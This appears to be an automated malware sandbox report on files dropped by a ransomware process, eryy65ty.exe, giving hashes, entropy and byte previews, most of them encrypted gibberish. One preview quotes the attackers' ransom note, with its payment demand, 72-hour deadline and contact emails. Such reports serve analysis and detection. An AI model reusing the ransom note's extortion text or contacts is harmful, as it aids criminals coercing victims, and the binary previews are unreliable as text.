                                                                                                                                              Preview:.Q2.|.<...)8...o9....IY.'...!........9.. .z..vI.'{t...s.9..TE...7@a...O...)"AY.F....v...P....7U.J.z.........8....f...$"V...0.|g..:.2..c.g...GJ..\.f.'yid.....%bc....}....G.^...2..Uo."......gWH..8..N...l...L.w3...^.i(n..?..i.Z....P=e..MO.&.^V..!...Z......r.4..oD....K ...k.Nm1....T`wW..N..f......I..m.....J....K.Y.[.=..V.....\.....M....:....p....<.....H3.~.^)=4...v...*.Z^...MX%i...........ET.v...../y,..<37.].(....jb>..'.n..^."...]...........q....M...f`..<x*w2....Q_R.o...\..F.3..J#p.d.K%...w.nS,..|.R[.Z......`O?V8..?....1u....r.q .g%..[.3s...<...4...W...vqr.hw.0{.<.....uFU][4..v...Z......x..O.LsY...jN.@.=.y.5..S&.2...".....tz..[.B.~...}c\...@..xk;.=....e...:G....@..E..X.|W.d..;&d....Ah.HOgW.c.......4...j.(\=*......y!)../..2r..WJ..{.~.K.5..;:+d\b.....0u.0V...Z....Y.V`..@a\s5.~..Dud..;u.+x..%,...u.B.4......iC.o-.k..........%....f..>....S;..spp.k........2I..X!......-.1..z?...,o.#...o.q..e..=.......[..h.qw.\..2..B.;..Q...<.4we.z6....s....l.V...#0..W4t.D....^i
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):290
                                                                                                                                              Entropy (8bit):7.16016101923439
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:wNhi2YAurngBSz3FCQ11n2VMxlPBSkVfW2hLQ2yiT4hHn:wNh5K8+3FLjn2mlPBSkPhNT4Jn
                                                                                                                                              MD5:68AADFEA5881E6BEBDA34F01C0DEE809
                                                                                                                                              SHA1:8E92AE5B991044FC2C6869DF7DA0B7F9382FE478
                                                                                                                                              SHA-256:D24EE7879267946904AF1631AB8A13A2C3A81E5EAFA649583338FA3A5A365DDB
                                                                                                                                              SHA-512:931B6156F30166A57F0766802909063389AC4A73FCF0C590377A6F1A6BAC6D4BF442FE6FDDB63033854E78C68A4F3D5A743E0409317A8FCBA0CFABDD7DECCE7F
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:O.../Q."...-Mn.ons":[]}Iv.........GEQ..#u.....U.E/.....;mz.4..g.....E1.V.....N.0..n.f{...!.V:9.Fts.UU.E....gR.D......9...sU...08..j..T%..k...8.5.5&.-W^.....s.2.@A..5..n...]........].8.9.N.D.;^j.*b`..XK..w.'`t..8....W....N..i..."....!.....O5..\}.66...7.=`.y.h\F..0ZCB0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):290
                                                                                                                                              Entropy (8bit):7.16016101923439
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:wNhi2YAurngBSz3FCQ11n2VMxlPBSkVfW2hLQ2yiT4hHn:wNh5K8+3FLjn2mlPBSkPhNT4Jn
                                                                                                                                              MD5:68AADFEA5881E6BEBDA34F01C0DEE809
                                                                                                                                              SHA1:8E92AE5B991044FC2C6869DF7DA0B7F9382FE478
                                                                                                                                              SHA-256:D24EE7879267946904AF1631AB8A13A2C3A81E5EAFA649583338FA3A5A365DDB
                                                                                                                                              SHA-512:931B6156F30166A57F0766802909063389AC4A73FCF0C590377A6F1A6BAC6D4BF442FE6FDDB63033854E78C68A4F3D5A743E0409317A8FCBA0CFABDD7DECCE7F
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:O.../Q."...-Mn.ons":[]}Iv.........GEQ..#u.....U.E/.....;mz.4..g.....E1.V.....N.0..n.f{...!.V:9.Fts.UU.E....gR.D......9...sU...08..j..T%..k...8.5.5&.-W^.....s.2.@A..5..n...]........].8.9.N.D.;^j.*b`..XK..w.'`t..8....W....N..i..."....!.....O5..\}.66...7.=`.y.h\F..0ZCB0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):229642
                                                                                                                                              Entropy (8bit):0.8764397808302534
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:TKNZZ8uUsbKEr1zkVmvQhyn+Zoz671333JrMM9NlS/LKXuPN8XTVlO:TKNZFUslrQMuf+PCq
                                                                                                                                              MD5:3974990E512F08C5205A542FDF607DDA
                                                                                                                                              SHA1:15FDB6322DE6F7E56F39A4111BAEA075F9044B43
                                                                                                                                              SHA-256:D7A7DC9757458F5EA88493B58261DB3EF02F1CB52BFDAC1D9509B88E1BA54079
                                                                                                                                              SHA-512:0BB430A642BE00E434CF01FDD565CD81A9B2FD5FAD81EF3C61DA9385586420773DFD831A0510C6FFCED605B6AF99B227AB19AF2BFA62C2BA2A94F3578660ED62
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:./uo....I... r?B..........k..e.............=.0......5Xe....g.me#....I...2-..UH.a...E\.R}.8z.*$.)..'..z.h........*(<.P.>M....!.^1........j.....`.,^d.h...z"..].B:....;.U.P....^=?af.^ms8..K....U..m..<N..'b*.j,..6..X.d....yQvN..h....L<%._...r..F..C.D...-1....y.TBT...E^....I.J@....K.x..M4..4n.6..Q..~.M..A..Q`..]x..?..G..<$..y.q..p.<._.....7.......g..:..s...#........i. .{...\.~!.!.}.."P.D...O.1...l.\.. vg9.>.N.A..$9E....E.^"Id.v.ij.L.pz.....:..-=`...8.. ...h.!V..B.:.......4"e>............a...Y,.H.1+..~Pl.pg.1.O........[U.~.../C#..1k../u.[....1..U&....Ro..`.{.C.TM..\..`.._..?...)..pP..+..s..X..eG..n.,.k).......;..".:..5.`t..i11~....(...O.t2...G..APB.'....0...A...l.^.tt+.#.....sp;...1.M:.#.z..:39.Nq...D..-....6..}.O...@....>...1....3.9...b...|...p.J?...8.u...o..........8x%...s.... d...$..r....Lj.d.6Ap]..(..Z..3.......l...ho.tM.;S.."...;...)j.*.2BKX..4.D:..?.W..],.....b....Hx.r;..0.lP...w.[}..$.,g..p.w... ........C...zu~n...
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):229642
                                                                                                                                              Entropy (8bit):0.8764397808302534
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:TKNZZ8uUsbKEr1zkVmvQhyn+Zoz671333JrMM9NlS/LKXuPN8XTVlO:TKNZFUslrQMuf+PCq
                                                                                                                                              MD5:3974990E512F08C5205A542FDF607DDA
                                                                                                                                              SHA1:15FDB6322DE6F7E56F39A4111BAEA075F9044B43
                                                                                                                                              SHA-256:D7A7DC9757458F5EA88493B58261DB3EF02F1CB52BFDAC1D9509B88E1BA54079
                                                                                                                                              SHA-512:0BB430A642BE00E434CF01FDD565CD81A9B2FD5FAD81EF3C61DA9385586420773DFD831A0510C6FFCED605B6AF99B227AB19AF2BFA62C2BA2A94F3578660ED62
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:./uo....I... r?B..........k..e.............=.0......5Xe....g.me#....I...2-..UH.a...E\.R}.8z.*$.)..'..z.h........*(<.P.>M....!.^1........j.....`.,^d.h...z"..].B:....;.U.P....^=?af.^ms8..K....U..m..<N..'b*.j,..6..X.d....yQvN..h....L<%._...r..F..C.D...-1....y.TBT...E^....I.J@....K.x..M4..4n.6..Q..~.M..A..Q`..]x..?..G..<$..y.q..p.<._.....7.......g..:..s...#........i. .{...\.~!.!.}.."P.D...O.1...l.\.. vg9.>.N.A..$9E....E.^"Id.v.ij.L.pz.....:..-=`...8.. ...h.!V..B.:.......4"e>............a...Y,.H.1+..~Pl.pg.1.O........[U.~.../C#..1k../u.[....1..U&....Ro..`.{.C.TM..\..`.._..?...)..pP..+..s..X..eG..n.,.k).......;..".:..5.`t..i11~....(...O.t2...G..APB.'....0...A...l.^.tt+.#.....sp;...1.M:.#.z..:39.Nq...D..-....6..}.O...@....>...1....3.9...b...|...p.J?...8.u...o..........8x%...s.... d...$..r....Lj.d.6Ap]..(..Z..3.......l...ho.tM.;S.."...;...)j.*.2BKX..4.D:..?.W..],.....b....Hx.r;..0.lP...w.[}..$.,g..p.w... ........C...zu~n...
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):466
                                                                                                                                              Entropy (8bit):7.515725483825642
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:ouimKsxgrrPOhwJYt/Z7S30QJL2mrqrz61f91BSn:ou7Kqgrihl/DQgmrbbBS
                                                                                                                                              MD5:7E8A9FD0E250013D9B082349FDB80ED5
                                                                                                                                              SHA1:B5F8DABD12DCFCDEA8C0A4CE7BF07EA417071651
                                                                                                                                              SHA-256:13FFA033C0BFB471BD7FEC6E721CE91D4B8148C3643FAD6CB1FEF7FDDDB46D8D
                                                                                                                                              SHA-512:243654B065730AD2A0DD6517FD624DC56E2A0729D46A8803C71C21B0FD2D664F0B7A8BC62022B56257996F53291862D48355762A339E4347BC80FE43F9B1FB78
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:..R........{`..z..gn..&......lL...,Y).f..]. xw.....JA!UWv.....d.@...w..P.....l..YZ...gC....[L.H..'.M..n_......f.z.....g.O.7^..L....JYj.I.!.Z....~Z...v.3q.....niTU.I.'.....rowser..f..`mP.e...Y....&..G ...<9.....F.W.$2.......9.fY.]r..Cf...w..k..EFq..!.....6.I......QR.06{8..\$........ ..A.....Z..n.Zv~h...5."x.PC,........m..."..l.3b.......;....OY......~.$....0^......+AA$V'..........N0"...q\.......?@.U)..Fg.y.m.%!.......0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):466
                                                                                                                                              Entropy (8bit):7.515725483825642
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:ouimKsxgrrPOhwJYt/Z7S30QJL2mrqrz61f91BSn:ou7Kqgrihl/DQgmrbbBS
                                                                                                                                              MD5:7E8A9FD0E250013D9B082349FDB80ED5
                                                                                                                                              SHA1:B5F8DABD12DCFCDEA8C0A4CE7BF07EA417071651
                                                                                                                                              SHA-256:13FFA033C0BFB471BD7FEC6E721CE91D4B8148C3643FAD6CB1FEF7FDDDB46D8D
                                                                                                                                              SHA-512:243654B065730AD2A0DD6517FD624DC56E2A0729D46A8803C71C21B0FD2D664F0B7A8BC62022B56257996F53291862D48355762A339E4347BC80FE43F9B1FB78
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..R........{`..z..gn..&......lL...,Y).f..]. xw.....JA!UWv.....d.@...w..P.....l..YZ...gC....[L.H..'.M..n_......f.z.....g.O.7^..L....JYj.I.!.Z....~Z...v.3q.....niTU.I.'.....rowser..f..`mP.e...Y....&..G ...<9.....F.W.$2.......9.fY.]r..Cf...w..k..EFq..!.....6.I......QR.06{8..\$........ ..A.....Z..n.Zv~h...5."x.PC,........m..."..l.3b.......;....OY......~.$....0^......+AA$V'..........N0"...q\.......?@.U)..Fg.y.m.%!.......0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1141
                                                                                                                                              Entropy (8bit):7.798495572009429
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:7+nZVF99xG2kIp9AfktKJt+iAIj0lTnvQr4+Z5lxpUo2:7Ohlkq9Rt7s0lTnIJp/Uo2
                                                                                                                                              MD5:7254084E71DB6415F88C5B746227183C
                                                                                                                                              SHA1:CEEB2D97676F16C9C5094E935263E892C97BAEA4
                                                                                                                                              SHA-256:849BA492E14FD6ED4C866B06E16344D64E05FBE6AC7555BF2C4277E2D76F241F
                                                                                                                                              SHA-512:EF066EAD1432B520A3536FE3F1CA82827649AE5051DAFD082C267E8F5ADCE03DBCB82611802E870FBB3A8DD2F6287D33F3E75035FCD02AD4557234D447430A0E
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:..T..`y{.&.K....-..wI.Q.Y_Y.(.[;...}y.~...Z{..;Q....}F.d.)d..a]B...L....tA6.F.6..8.......D.O.T._.^.-)T........H..Q.F='2N.m....s..={........P=H......2`......G.,.HKBo35..qH'....@..c~.k.H:....C^.L|2N).1qK.6.....m]..i...8..G...je.\^....... .....o!...."...>...xC.E..W....=.S.......l.HT..!~O.s...&..{.m.1.+...T.....z...fH.k.9....K..t.8...v...^.....K.I.k.M.c.....E....2w...y......q....w,v.9.."8.....",.$.<.7 X.L..x.....S.....D$...|M.@....z..E.).UMu..\.X.W..="k5..6.O....4c..{......f).......,.p...B...6...H~Zz..[_........+;.;.....O.6..DP`../..s.Y>...........I+[Q..3....7.-ZN.e.F@ol.~.LGI......S......,..i!y....<....6qE.N...(..@$l..Q....B..4....AJ..w...H.....8.v...w.^...B5]..$<Tgz.T>..G.._.j.......}<P.<...8..'d..:o.....ea)..r.[..T>%..9A..W.A.i...Q]..L.CU..?......i..b.Zz>.\.n..5.3c'x.L.6.Q.|2Ed.E_..-...o..~(.f&H...n..Fd..d....XsKey":""}]}!...=..$.t9U*W.~hh}.J){..6.'.tO....[m..........J*.[N...>.Da..r.....>.-.wUN..w!.qUOK...8G.+........H...V....[(...tm.7.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1141
                                                                                                                                              Entropy (8bit):7.798495572009429
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:7+nZVF99xG2kIp9AfktKJt+iAIj0lTnvQr4+Z5lxpUo2:7Ohlkq9Rt7s0lTnIJp/Uo2
                                                                                                                                              MD5:7254084E71DB6415F88C5B746227183C
                                                                                                                                              SHA1:CEEB2D97676F16C9C5094E935263E892C97BAEA4
                                                                                                                                              SHA-256:849BA492E14FD6ED4C866B06E16344D64E05FBE6AC7555BF2C4277E2D76F241F
                                                                                                                                              SHA-512:EF066EAD1432B520A3536FE3F1CA82827649AE5051DAFD082C267E8F5ADCE03DBCB82611802E870FBB3A8DD2F6287D33F3E75035FCD02AD4557234D447430A0E
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..T..`y{.&.K....-..wI.Q.Y_Y.(.[;...}y.~...Z{..;Q....}F.d.)d..a]B...L....tA6.F.6..8.......D.O.T._.^.-)T........H..Q.F='2N.m....s..={........P=H......2`......G.,.HKBo35..qH'....@..c~.k.H:....C^.L|2N).1qK.6.....m]..i...8..G...je.\^....... .....o!...."...>...xC.E..W....=.S.......l.HT..!~O.s...&..{.m.1.+...T.....z...fH.k.9....K..t.8...v...^.....K.I.k.M.c.....E....2w...y......q....w,v.9.."8.....",.$.<.7 X.L..x.....S.....D$...|M.@....z..E.).UMu..\.X.W..="k5..6.O....4c..{......f).......,.p...B...6...H~Zz..[_........+;.;.....O.6..DP`../..s.Y>...........I+[Q..3....7.-ZN.e.F@ol.~.LGI......S......,..i!y....<....6qE.N...(..@$l..Q....B..4....AJ..w...H.....8.v...w.^...B5]..$<Tgz.T>..G.._.j.......}<P.<...8..'d..:o.....ea)..r.[..T>%..9A..W.A.i...Q]..L.CU..?......i..b.Zz>.\.n..5.3c'x.L.6.Q.|2Ed.E_..-...o..~(.f&H...n..Fd..d....XsKey":""}]}!...=..$.t9U*W.~hh}.J){..6.'.tO....[m..........J*.[N...>.Da..r.....>.-.wUN..w!.qUOK...8G.+........H...V....[(...tm.7.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:COM executable for DOS
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):262410
                                                                                                                                              Entropy (8bit):0.2939114723532176
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cn4kOgg6Em7I2JKmVRRxg+u7+/j2ZcNOH8TedtMgl+WmZqhO:TkOgg6EmGmnu7+qMTIT8ohO
                                                                                                                                              MD5:225FABAC54DDCF262FCBDDB7948F2FED
                                                                                                                                              SHA1:E9623CA78D3264AD5E414CD051D385FCE973EAAE
                                                                                                                                              SHA-256:43FE3E00DE3F2B561CA2CDF8CF7473C80614B3269BEF567D7C3688CCDEECACEC
                                                                                                                                              SHA-512:9EFB361CE131625E88C436B704D14528938E6541E113A9D46252357AF24C92A8F286EE42044F3B4AB45957F8A6D16566120D5BF8D296456FCBCFCAF157E04345
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:.......p*..t.W......r..%.r|.5Lo9....X.........[.@_n.p.........x...%;...:.l..#T...!0r../|..J3.b\.x7......d.....{.{.....XWA.c.. |<=..V...A..A....;tP!Ho.s...w.[...Q...K..E{-..?...v..Q...(\#W...2....M5..^.K..<<.!uN.|7...'k..j...S.[:@..........U0.`.u.....f.g..}..7Qj...:1.n.b..2.`KH.-..lj19....e...j.x|j.'.).~VX'A].*k7.+a.W..v1(S=P...R.........@`.r..2...(...q.8....>.A..?....|.f.....~.}..Z.B[...xW.N.eJ.5...H!-s..F%7.."=.......p...uO.{....j.v|....y.....0x.......I......1.....P[..'...,.l.* ..i`....F\....p".?..5R.>CTa..........8$.;..+...._1>x.G.*._.|..Qn&3...yA....!.T.........WM2yL..dH.Y..MS.....t.x._.L........^.. .}k......U..|..W."!(.t.b...z.....qb|......M.n..5...lt ...5.&...s..).|.B+>7S...eEV.x..0..W.0l...;'.!Mg.5.y.....*....,......U!.r...'...Jh.vo{.].&..;.0o..d......W....O......c.....=.%...c.I..r3|D..%K<tZs....{G.oO.l...........,A..s...1;........~$d...GoY.$......v+.)$5.*...D.\,d.Uc...q...`.o.toL.W.Q..X...C]..T'.......u.....>\....M.L......L.....2...n.M
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:COM executable for DOS
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):262410
                                                                                                                                              Entropy (8bit):0.2939114723532176
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cn4kOgg6Em7I2JKmVRRxg+u7+/j2ZcNOH8TedtMgl+WmZqhO:TkOgg6EmGmnu7+qMTIT8ohO
                                                                                                                                              MD5:225FABAC54DDCF262FCBDDB7948F2FED
                                                                                                                                              SHA1:E9623CA78D3264AD5E414CD051D385FCE973EAAE
                                                                                                                                              SHA-256:43FE3E00DE3F2B561CA2CDF8CF7473C80614B3269BEF567D7C3688CCDEECACEC
                                                                                                                                              SHA-512:9EFB361CE131625E88C436B704D14528938E6541E113A9D46252357AF24C92A8F286EE42044F3B4AB45957F8A6D16566120D5BF8D296456FCBCFCAF157E04345
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:.......p*..t.W......r..%.r|.5Lo9....X.........[.@_n.p.........x...%;...:.l..#T...!0r../|..J3.b\.x7......d.....{.{.....XWA.c.. |<=..V...A..A....;tP!Ho.s...w.[...Q...K..E{-..?...v..Q...(\#W...2....M5..^.K..<<.!uN.|7...'k..j...S.[:@..........U0.`.u.....f.g..}..7Qj...:1.n.b..2.`KH.-..lj19....e...j.x|j.'.).~VX'A].*k7.+a.W..v1(S=P...R.........@`.r..2...(...q.8....>.A..?....|.f.....~.}..Z.B[...xW.N.eJ.5...H!-s..F%7.."=.......p...uO.{....j.v|....y.....0x.......I......1.....P[..'...,.l.* ..i`....F\....p".?..5R.>CTa..........8$.;..+...._1>x.G.*._.|..Qn&3...yA....!.T.........WM2yL..dH.Y..MS.....t.x._.L........^.. .}k......U..|..W."!(.t.b...z.....qb|......M.n..5...lt ...5.&...s..).|.B+>7S...eEV.x..0..W.0l...;'.!Mg.5.y.....*....,......U!.r...'...Jh.vo{.].&..;.0o..d......W....O......c.....=.%...c.I..r3|D..%K<tZs....{G.oO.l...........,A..s...1;........~$d...GoY.$......v+.)$5.*...D.\,d.Uc...q...`.o.toL.W.Q..X...C]..T'.......u.....>\....M.L......L.....2...n.M
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):98570
                                                                                                                                              Entropy (8bit):0.6758058694336553
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:T0IXJ/Yi3tjtgTkUFWlH7xo2vo1/wU0larzRAOxmI:IIXJ/Yutxubc72brzRtxl
                                                                                                                                              MD5:01002A8DBC2554AF52805B7A29501781
                                                                                                                                              SHA1:3048C7D7226641BB6ECFE3A2F3C7B71041490CC0
                                                                                                                                              SHA-256:3A6D73B0BA1F202736763077073A1CA84EB7D4FEAE3A76646F44D42C4F43AD45
                                                                                                                                              SHA-512:DFA7907646EFE9F3523D66D8108706BDD4428EF7D79A39144F4DB8BD9BBE4D841FD54F43A666E074213C79567F17E098A4F6C8179A2ABF06F0EB4C4B2D60A1AA
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:J...d.......u^...~..H.".U\\2m...Z....t....5g.AwF6.._....'u...C......,.$..).....!%.&...E.~3."R....u...[... ..)~v._'.9..-4/.s..G.nq.....i....3...f..9[.k.;.X3.'0..k.\.j.T.5.- ..Hpe.n.Z..j.....{3;...n..dT.:e.b../h.9\....J..5..."VT.....SJ !.]....Ey .xY`D#.DU.3.A^".4...+..X 9#m......C....%a...'.*...9..S..~..3.B....q.Sr.s2.O5.f4..1.tm.s.....(.mq....%aUPO6gU..S..i...^)J?.w....e.......y...I/S..H......^....b#.....B.I.Q@..y..U.*.Y!.....y..C...g.....*..K..x+j.2.3S.....b.,.#.....O.A.~..@i....o.6.U..y..N~^.Dd.kR..s.......[...Zg0.8..3.*.^..k..<.3.....@...j%+9.......p...]\.....u...X.[*.@.....R.[85.Jx......f.+.Hm[`d.'.A.e.....4.....g...uM....T.:Z*..f.........7...z..fdw2..4.xB.nzT.....-...;.....D...+..3.....5.1]Bc@......J.?.aS.@?.S....S....M...Nc..;k...n.....a...$.....x.!..X.WI5.y.n..IO.pY.}.;.N5.4d.j.e.-..`....g..k...~.^..a..w*.....%7Y.p.t.Ty'C...fp.....&...>52(4@nC....j.}7'X.............A.......@.....dqT.K*...!^..`z.....>........K%..OYo....B....w....yd>=.......Z.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):33034
                                                                                                                                              Entropy (8bit):1.608297290944575
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:jmslr/ku9KO8T7dbc3f7aFrGPx82q6QtcUFIwxpZ/mYjW6aOIA2oVUjIU:jnrMu2TpcDOiPs6QHFIzQaHOUjIU
                                                                                                                                              MD5:C9AA962452A5D4B4CD64ACE99C88C83C
                                                                                                                                              SHA1:046EAC8112463E13D99D85151AB0C4444E8A205A
                                                                                                                                              SHA-256:A61D1557169FECFE9EC4780A304AC858B2DFCBE866207B4111CC3255F9AE226A
                                                                                                                                              SHA-512:7D3A74416C00F8E41198B14B8F61CD77B5E1AD43D60A387BFC89B674AFE2FAC59E4883B398A4895730B4ABDF867BA743E8F8B808ED3CBF34658DC6E9E6EBD6FD
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:..&.<..G...d.n..'..-....=.\.i.(/..t..=..y.b.G.^..D.bL.f`.B0.1H.A.(F.N`H.._...n...'.Hq5.f.N.`.....[E......L.Y..!k{...^T.QN5../.XI...8R..7.o.].U..3..$|....,.^t..6..`J...0..r}F.9p..L.t..2.9.]=.#.Rv.%..;.m.q.ao%.........N;...#_.._U...XK..'......U..@..pp....t.9i..9....[D.`acQ.,FA.....6j....w...&O.1.,...g..1*.|.o....HSlc.V.+.z..>....,...k;.@M..EdcS.6.ql.l. ....l.....V.0...NY..KG^/.b...g./.....-..v(.l...*d...../}.g....O.....e..,G1.......*.Am...C2.N...m.......L..Ll....$....n.yV...1.A.V...A.....7.)j......[..I...g.1......D.Ga/...f.X0..A..X...`..a..&...L\.gS.v[.....H&..R.t@.8W=O..~.V.s\....B..{p.. .U../X....B............\G...?..D.`.V..F.U...o.Z..x.a.Q.K....j]...3$i.aA..P2S...u.@R\.N{..Hi7.r.Q. a....Z.q<.]...../^.e..u.A2S.6T..........~.....g......e.'.J.J....+.2O.(..o.s........8C4.L..r.J}j:B.j.^.>Ih.-UFc.E.^...d/C..m.....O....p.....0!.2......r...........q,~.%.....8.h..9P.e....!....d.I.w^|.RT.g!...b..J.TW.e.'(.......0...=.......F........*.... .E...V.'.R.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):33034
                                                                                                                                              Entropy (8bit):1.608297290944575
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:jmslr/ku9KO8T7dbc3f7aFrGPx82q6QtcUFIwxpZ/mYjW6aOIA2oVUjIU:jnrMu2TpcDOiPs6QHFIzQaHOUjIU
                                                                                                                                              MD5:C9AA962452A5D4B4CD64ACE99C88C83C
                                                                                                                                              SHA1:046EAC8112463E13D99D85151AB0C4444E8A205A
                                                                                                                                              SHA-256:A61D1557169FECFE9EC4780A304AC858B2DFCBE866207B4111CC3255F9AE226A
                                                                                                                                              SHA-512:7D3A74416C00F8E41198B14B8F61CD77B5E1AD43D60A387BFC89B674AFE2FAC59E4883B398A4895730B4ABDF867BA743E8F8B808ED3CBF34658DC6E9E6EBD6FD
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..&.<..G...d.n..'..-....=.\.i.(/..t..=..y.b.G.^..D.bL.f`.B0.1H.A.(F.N`H.._...n...'.Hq5.f.N.`.....[E......L.Y..!k{...^T.QN5../.XI...8R..7.o.].U..3..$|....,.^t..6..`J...0..r}F.9p..L.t..2.9.]=.#.Rv.%..;.m.q.ao%.........N;...#_.._U...XK..'......U..@..pp....t.9i..9....[D.`acQ.,FA.....6j....w...&O.1.,...g..1*.|.o....HSlc.V.+.z..>....,...k;.@M..EdcS.6.ql.l. ....l.....V.0...NY..KG^/.b...g./.....-..v(.l...*d...../}.g....O.....e..,G1.......*.Am...C2.N...m.......L..Ll....$....n.yV...1.A.V...A.....7.)j......[..I...g.1......D.Ga/...f.X0..A..X...`..a..&...L\.gS.v[.....H&..R.t@.8W=O..~.V.s\....B..{p.. .U../X....B............\G...?..D.`.V..F.U...o.Z..x.a.Q.K....j]...3$i.aA..P2S...u.@R\.N{..Hi7.r.Q. a....Z.q<.]...../^.e..u.A2S.6T..........~.....g......e.'.J.J....+.2O.(..o.s........8C4.L..r.J}j:B.j.^.>Ih.-UFc.E.^...d/C..m.....O....p.....0!.2......r...........q,~.%.....8.h..9P.e....!....d.I.w^|.RT.g!...b..J.TW.e.'(.......0...=.......F........*.... .E...V.'.R.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):292
                                                                                                                                              Entropy (8bit):7.179506621230169
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:EkF8T/2Wh+GvHWF0PzPX1Kf/EqVzJqTRWNoKVF88d/MTJ2n:Ew8TeUzwGJgJqT6nFTdEd2n
                                                                                                                                              MD5:3A9051E77224FB27495985E0487BE8EC
                                                                                                                                              SHA1:AE290CFD9ED4033C352573DC77096B2DFA750611
                                                                                                                                              SHA-256:44335D4947A1208EC45AA8FAE430FF3BF5820352F0D8EFF74D5260DC881CCE9E
